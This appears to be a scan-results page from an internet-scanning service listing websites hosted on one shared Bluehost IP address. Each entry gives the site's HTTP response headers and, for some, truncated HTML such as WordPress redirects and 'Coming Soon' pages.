HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:22:08 GMT Server: Apache Link: <https://outdoor-treasury.com/index.php?rest_route=/>; rel="https://api.w.org/", <https://outdoor-treasury.com/index.php?rest_route=/wp/v2/pages/4>; rel="alternate"; title="JSON"; type="application/json", <https://outdoor-treasury.com/>; rel=shortlink Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.gix.bqu.mybluehost.me
2024-09-16 09:21
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.upperwestjess.com
2024-09-16 09:21
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:21:58 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://upperwestjess.com/ Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:26:54 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.mindfulnesstrainingcentre.com
2024-09-16 09:21
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:21:49 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://mindfulnesstrainingcentre.com/wp-json/>; rel="https://api.w.org/" Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:44 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.michaelsheffieldlivingtrust.com
2024-09-16 09:21
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:21:33 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://cbdx6.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:80 · www.workbookz.com
2024-09-16 09:21
HTTP/1.1 403 Forbidden Date: Mon, 16 Sep 2024 09:21:28 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 318 host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Page title: 403 Forbidden <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.smithonthegreen.com
2024-09-16 09:21
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:21:30 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://smithonthegreen.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:22 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · thh.goj.mybluehost.me
2024-09-16 09:21
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:21:23 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://spicesline.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:20 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.divaslc.com
2024-09-16 09:21
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:21:23 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://divaslc.org/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:23 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · benskemovers.com
2024-09-16 09:21
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:21:15 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://benskemovers.com/wp-json/>; rel="https://api.w.org/", <https://benskemovers.com/wp-json/wp/v2/pages/19>; rel="alternate"; title="JSON"; type="application/json", <https://benskemovers.com/>; rel=shortlink Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:13 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.oml.oha.mybluehost.me
2024-09-16 09:21
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:21:12 GMT Server: Apache X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://therenfamily.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:21:12 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 0 Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · maktowing.com
2024-09-16 09:21
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:21:14 GMT Server: Apache Link: <https://maktowing.com/wp-json/>; rel="https://api.w.org/", <https://maktowing.com/wp-json/wp/v2/pages/9>; rel="alternate"; type="application/json", <https://maktowing.com/>; rel=shortlink Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.calledtostandinthegap.com
2024-09-16 09:21
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:21:12 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Standing in the Gap — Coming Soon <!DOCTYPE html> <html lang="en-US"> <head> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow" /> <title>Standing in the Gap — Coming Soon</title> <script src="https://calledtostandinthegap.com/wp-includes/js/jquery/jquery.js"></script> <style type="text/css">* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body { background-color: white; color: black; overflow-x: hidden; margin: 0; } #wrap { align-items: center; display: flex; justify-content: center; min-height: 100vh; } .content { flex: 1; margin: auto 5%; padding: 0; text-align: center; max-width: 420px; } footer { width: 100%; position: fixed; bottom: 0; left: 0; } footer p { text-align: center; } .btn { background: black; background-image: none; border: 1px solid black; box-shadow: none; color: white; cursor: pointer; display: inline-block; font-size: 14px; font-weight: 400; line-height: 1.5; margin-top: 10px; padding: 6px 30px; text-align: center; text-decoration: none; touch-action: manipulation; transition: all 0.2s ease; user-select: none; vertical-align: middle; white-space: nowrap; } .status-message { display: none; }</style> <link rel="stylesheet" href="https://calledtostandinthegap.com/wp-content/plugins/bluehost-wordpress-plugin/assets/styles/coming-soon.css?v=3.14.9" /> </head> <body> <div id="wrap"> <main class="content"> <div class="subscription_widget"> <h1>Coming Soon!</h1> <h2>A New WordPress Site</h2> <p class="comingsoon_links"><a href="https://www.bluehost.com/blog/how-to-create-a-website-guide/" target="_blank" rel="noopener noreferrer nofollow">How to Build a Website: A Practical Guide to WordPress on Bluehost</a><br /><a href="https://www.bluehost.com/blog/how-to-migrate-a-wordpress-website-to-a-new-server/" target="_blank" rel="noopener noreferrer nofollow">How to Migrate a Website to Bluehost?</a><br /><a href="https://www.bluehost.com/hosting/shared" target="_blank" rel="noopener noreferrer nofollow">Why choose Bluehost for your WordPress site?</a><br /></p> </div> </main> </div> <footer> <p class="text-center"> A <a href="https://bluehost.com?utm_source=coming-soon-template&utm_medium=bluehost_plugin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a> powered website. Is this your website? Log in to <a href="https://calledtostandinthegap.com/wp-login.php">WordPress</a> or <a href="https://my.bluehost.com/web-hosting/cplogin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a>. </p> </footer> </body> </html>Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · legionpost412.org
2024-09-16 09:20
HTTP/1.1 500 Internal Server Error Date: Mon, 16 Sep 2024 09:21:01 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://legionpost412.org/wp-json/>; rel="https://api.w.org/", <https://legionpost412.org/wp-json/wp/v2/pages/41>; rel="alternate"; title="JSON"; type="application/json", <https://legionpost412.org/>; rel=shortlink X-LiteSpeed-Tag: 325_HTTP.200,325_HTTP.500 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Connection: close Transfer-Encoding: chunked Page title: American LegionWordPress › Error <!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>American Legion</title> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel="alternate" type="application/rss+xml" title="American Legion » Feed" href="https://legionpost412.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="American Legion » Comments Feed" href="https://legionpost412.org/comments/feed/" /> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/legionpost412.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); </script> <link rel='stylesheet' id='wc-blocks-integration-css' href='https://legionpost412.org/wp-content/plugins/woocommerce-payments/vendor/woocommerce/subscriptions-core/build/index.css?ver=5.7.2' media='all' /> <style id='wp-emoji-styles-inline-css'>Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.csmontclair.com
2024-09-16 09:20
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:20:59 GMT Server: Apache Link: <https://www.csmontclair.com/wp-json/>; rel="https://api.w.org/", <https://www.csmontclair.com/wp-json/wp/v2/pages/537>; rel="alternate"; title="JSON"; type="application/json", <https://www.csmontclair.com/>; rel=shortlink Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:20:59 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.yallbeen.com
2024-09-16 09:20
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:20:58 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://yallbeen.com/wp-json/>; rel="https://api.w.org/" Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:20:56 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.nly.jru.mybluehost.me
2024-09-16 09:20
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:20:56 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-UA-Compatible: IE=edge X-Redirect-By: WordPress Location: https://the-puruen.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:20:53 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.nre.nfp.mybluehost.me
2024-09-16 09:20
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:20:54 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://whosjudginganyway.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:20:49 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:80 · www.ecw.fzi.mybluehost.me
2024-09-16 09:20
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:20:48 GMT Server: Apache X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://hadiati-bh.com/ Cache-Control: max-age=0 Expires: Mon, 16 Sep 2024 09:20:48 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.3dimensionrc.com
2024-09-16 09:20
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:20:29 GMT Server: Apache X-Pingback: https://3dimensionrc.com/xmlrpc.php X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://3dimensionrc.com/ host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Content-Length: 0 Content-Type: text/html; charset=UTF-8
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · billrutlandmusic.com
2024-09-16 09:20
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:20:26 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://billrutlandmusic.com/wp-json/>; rel="https://api.w.org/" Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:20:23 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: Bill Rutland Music <!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://billrutlandmusic.com/xmlrpc.php"> <title>Bill Rutland Music</title> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//i0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="Bill Rutland Music » Feed" href="https://billrutlandmusic.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Bill Rutland Music » Comments Feed" href="https://billrutlandmusic.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/billrutlandmusic.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallFound 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · oquirrhstake.org
2024-09-16 09:20
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:20:17 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://oquirrhstake.org/wp-json/>; rel="https://api.w.org/", <https://oquirrhstake.org/wp-json/wp/v2/pages/5>; rel="alternate"; title="JSON"; type="application/json", <https://oquirrhstake.org/>; rel=shortlink Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:25:17 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: Oquirrh Stake – West Jordan Utah <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://oquirrhstake.org/xmlrpc.php"> <title>Oquirrh Stake – West Jordan Utah</title> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="Oquirrh Stake » Feed" href="https://oquirrhstake.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Oquirrh Stake » Comments Feed" href="https://oquirrhstake.org/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v8.10.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <!-- Note: MonsterInsights is not currently configured on this site. The site owner needs to authenticate with Google Analytics in the MonsterInsights settings panel. --> <!-- No UA code set --> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/oquirrhstake.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.carriganisms.com
2024-09-16 09:20
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:20:09 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Cache-Control: no-store, no-cache, must-revalidate Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:25:07 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: carriganisms — Coming Soon <!DOCTYPE html> <html lang="en-US"> <head> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow" /> <title>carriganisms — Coming Soon</title> <script src="https://carriganisms.com/wp-includes/js/jquery/jquery.js"></script> <style type="text/css">* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body { background-color: white; color: black; overflow-x: hidden; margin: 0; } #wrap { align-items: center; display: flex; justify-content: center; min-height: 100vh; } .content { flex: 1; margin: auto 5%; padding: 0; text-align: center; max-width: 420px; } footer { width: 100%; position: fixed; bottom: 0; left: 0; } footer p { text-align: center; } .btn { background: black; background-image: none; border: 1px solid black; box-shadow: none; color: white; cursor: pointer; display: inline-block; font-size: 14px; font-weight: 400; line-height: 1.5; margin-top: 10px; padding: 6px 30px; text-align: center; text-decoration: none; touch-action: manipulation; transition: all 0.2s ease; user-select: none; vertical-align: middle; white-space: nowrap; } .status-message { display: 